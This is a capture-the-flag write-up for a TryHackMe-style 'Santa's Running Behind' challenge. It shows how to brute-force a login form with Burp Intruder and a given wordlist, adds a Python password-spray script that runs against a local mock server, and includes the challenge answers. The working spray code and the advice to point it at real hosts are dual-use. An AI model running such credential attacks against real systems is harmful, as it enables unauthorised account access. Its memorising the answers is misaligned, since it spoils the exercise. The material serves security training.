[Day 4] Santa's Running Behind
{Web Exploitation = Fuzzing}
Accessing the site reveals a login form as shown below.

The following password list was provided with the challenge:

```
christmas
elves!
santa
festive
joy123
myrrh!
yuletide
presents
candy
tidings
cookie
cookies
biscuits!
snowball
snowball123
```
First, capture a dummy login request for the santa user in Burp Suite and send it to Intruder.


Clear the default payload markers and mark only the password value as the payload position, keeping the username fixed as santa.

Paste the wordlist above into Payload set 1 (a simple list) and start the attack.

Once the attack completes, sort the results by status code or response length. Every failed attempt returns a 200 with the same length, while one request stands out with a different response length and a status code of 302, i.e. a redirect, which is the tell-tale sign of a successful login.
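The same spray can be scripted instead of clicking through Intruder. The block below is an added example, not part of the original write-up or of the TryHackMe challenge: it stands up a constructed stand-in for the login form on localhost (assuming the form posts `username` and `password` fields, answers a correct pair with a 302 and everything else with an identical 200 error page), posts every password from the list for the santa user, and flags the requests whose (status, length) pair deviates from the majority, which is exactly what sorting the Intruder table surfaces.

```python
"""Scripted equivalent of the Burp Intruder password spray used above."""
import http.client
import threading
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import parse

# The wordlist handed out in the challenge.
WORDLIST = [
    "christmas", "elves!", "santa", "festive", "joy123", "myrrh!", "yuletide",
    "presents", "candy", "tidings", "cookie", "cookies", "biscuits!",
    "snowball", "snowball123",
]


class FakeLogin(BaseHTTPRequestHandler):
    """Constructed stand-in for the challenge login form (the real app is not
    reproduced here). Assumes the form posts 'username' and 'password' fields,
    answers a correct pair with a 302 to the itinerary and anything else with
    an identical 200 error page, the pattern the Intruder results show."""

    VALID = ("santa", "cookie")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = parse.parse_qs(self.rfile.read(length).decode())
        creds = (fields.get("username", [""])[0], fields.get("password", [""])[0])
        if creds == self.VALID:
            self.send_response(302)
            self.send_header("Location", "/itinerary")
            self.send_header("Content-Length", "0")
            self.end_headers()
        else:
            page = b"<html><body>Invalid username or password.</body></html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(page)))
            self.end_headers()
            self.wfile.write(page)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_server():
    """Run FakeLogin on a random loopback port in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), FakeLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def attempt(host, port, path, username, password):
    """POST one credential pair and return (status, body_length, location).
    http.client never follows redirects, so a 302 is reported as-is rather
    than being silently turned into a GET of the next page."""
    body = parse.urlencode({"username": username, "password": password})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", path, body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, len(data), resp.getheader("Location")


def spray(host, port, path, username, wordlist):
    """Try every password for one user and return those whose response
    deviates from the majority (status, length) pair. The majority is the
    'login failed' baseline; anything else is a candidate, which is what
    sorting the Intruder table by status or length surfaces."""
    results = {pw: attempt(host, port, path, username, pw) for pw in wordlist}
    baseline = Counter((s, n) for s, n, _ in results.values()).most_common(1)[0][0]
    return [pw for pw, (s, n, _) in results.items() if (s, n) != baseline]


if __name__ == "__main__":
    server = start_server()
    port = server.server_address[1]
    for pw in spray("127.0.0.1", port, "/login", "santa", WORDLIST):
        status, size, location = attempt("127.0.0.1", port, "/login", "santa", pw)
        print(f"santa:{pw} -> {status} ({size} bytes) Location: {location}")
    server.shutdown()
```

Against a real target, point `attempt` at the actual host, port and form path, and check first whether the application enforces account lockout or rate limiting: fifteen rapid attempts against one account is enough to lock it out on many systems, which would turn a quick fuzz into a self-inflicted denial of service.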
Logging in with santa:cookie succeeds and we are able to see Santa's itinerary.

What valid password can you use to access the "santa" account?
- cookie

What is the flag in Santa's itinerary?
- THM{SANTA_*******}